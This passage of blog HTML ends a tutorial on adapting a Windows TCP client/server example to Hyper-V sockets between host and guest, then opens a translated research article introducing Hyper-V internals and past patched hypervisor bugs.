<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DEFINE_GUID</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(HV_GUID_ZERO,0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0);</span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Initialize GUIDS</span></div>
</li>
</ol>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSID ServiceID;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wchar_t</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">* clsid_str = </span><span style="background-color: transparent; color: #a31515; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">L"{b1d00d3e-fe10-4570-ad62-7648779d7a1b}"</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">CLSIDFromString(clsid_str, &ServiceID); </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//GUID of Service, generated by powershell</span></div>
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Change protocol parameters</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&clientService, </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(clientService));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.Family = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.VmId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HV_GUID_ZERO;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">clientService.ServiceId </span><span style="background-color: transparent; color: teal; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *serviceId;</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ZeroMemory</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(&hints, </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(hints));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_family = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AF_HYPERV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Internet address family is unspecified so that either an IPv6 or IPv4 address can be returned</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_socktype = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCK_STREAM</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// Requests the socket type to be a stream socket for the TCP protocol</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_protocol = </span><span style="background-color: transparent; color: #6f008a; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_PROTOCOL_RAW</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_addrlen = </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sizeof</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR_HV</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hints.ai_addr = </span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">reinterpret_cast</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">SOCKADDR</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *>(&clientService);</span></div>
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replace code</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); - orig.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ListenSocket = socket(hints.ai_family, hints.ai_socktype, hints.ai_protocol);</span></div>
<br />
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Consolas; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Replace code</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); - orig.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 54pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">iResult = bind(ListenSocket, hints.ai_addr, (</span><span style="background-color: transparent; color: blue; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: transparent; color: black; font-family: "consolas"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)hints.ai_addrlen);</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 36pt; margin-top: 0pt; text-indent: -18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Compile solution. You get ClientExample.exe and ServerExample.exe. Run ServerExample on host server and ClientExample in guest virtual machine. Enter “test” in ClientExample.exe and see it as output of ServerExample.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="241" src="https://lh4.googleusercontent.com/f71qOCAcLyy_MGc9_N8t-dMxyRyvQ1VGqPCIjMfFEYUC5STCtsJu9WOWQJE3wjrlbhxvJh2gUUqmz_kQMuGj5FVHVf7848nPlYqMWstBZICXr0eJmhDHYGYnZmy1S2TPXw3dTJAtBPcQHUPHFQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="350" /></span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> After you register service you can run applications with simple user privileges on host server or virtual machine. It works like usual network application and doesn't need any special permissions for work.</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> P.S. If you use one of existring GUID as ServiceID:</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 7FDFD0EA-CEA8-4576-92D6-E072DDD2C422 - Machine Provisioning Service</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ACEF5661-84A1-4E44-856B-6245E69F4620 - Host Compute Service</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 999E53D4-3D5C-4C3E-8779-BED06EC056E1 - VM Session Service 1</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> A5201C21-2770-4C11-A68E-F182EDB29220 - VM Session Service 2</span><br />
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> you don't need administrative privileges for using Hyper-V sockets</span></div>
<div style="text-align: left;">
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></div>
<span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sources</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service//" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service\</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="http://www.askyb.com/windows-socket/windows-socket-example-tcp-client-and-server" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://www.askyb.com/windows-socket/windows-socket-example-tcp-client-and-server</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://w4mhi.wordpress.com/complete-hyper-v-socket-client-code/</span></a><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - very good article. But code compiles with errors.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/gerhart01/HyperV-sockets" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/HyperV-sockets</span></a><span style="background-color: transparent; color: #222222; font-family: "calibri"; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - source code from article.</span></div>
</li>
</ol>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-63526309886965298032015-10-22T12:01:00.002-07:002015-10-31T10:54:13.998-07:00Hyper-V internals<div dir="ltr" style="text-align: left;" trbidi="on">
<b style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Great thanks to ERNW for the translation of the article!</span></b></span></b><br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></b> </span></b><br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(Original article was published </span></b></span></b><span style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;"><span style="font-weight: normal;">on</span></span></span><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><b> </b>https://xakep.ru/2014/11/24/research-hyper-v and https://xakep.ru/2015/01/05/hyper-v-research-part-2)</span></b></span></b><br />
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></b></span></b>
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root-section (parent partition, root OS) - Windows Server 2012 R2 with the included component of Hyper-V;</span></b></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest operating systems - virtual machine Hyper-V installed Windows Server 2012 R2;</span></b></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">TLFS – Hypervisor Top-Level Functional Specification: Windows Server 2012 R2;</span></b></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: justify;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">LIS – Linux Integration Services</span></b></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finding a bug, which later received the number MS13-092 (error component Hyper-V Windows Server 2012 allows you to send a hypervisor in BSOD from the guest operating system or run arbitrary code in other guest operating systems which are running on a vulnerable host server), it was very unpleasant surprise for Microsoft Engineers. Before that, for almost three years, no one has discovered a vulnerability in Hyper-V. It was only the MS10-102, which were found at the end of 2010. During those four years, the popularity of cloud services increased greatly, and researchers are more and more interested in security hypervisor underlying cloud systems. (Another bug MS15-042 was fixed but there is no detailed overview of this).</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, the number of publicly available work is low: the researchers are reluctant to spend their time exploring such complex and poorly documented architectural solutions. This article does not describe the specific vulnerabilities of the hypervisor, but it should shed light on the inner workings of Hyper-V, and thereby partially simplify future research. </span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This article will describe some features of the hypervisor, in particular the component of the vmbus message processing mechanism using the steal a hypervisor mechanism. (Before reading the article, it is recommended to get acquainted with the report from ERNW </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><a href="http://goo.gl/1Cvotv" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://goo.gl/1Cvotv</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)<b>,</b> «Hyper-V debugging for beginners» </span></b><span style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(http://hvinternals.blogspot.com/2015/10/hyper-v-debugging-for-beginners.html)</span></span><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and Hypervisor TLFS (http://goo.gl/9dISj7</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
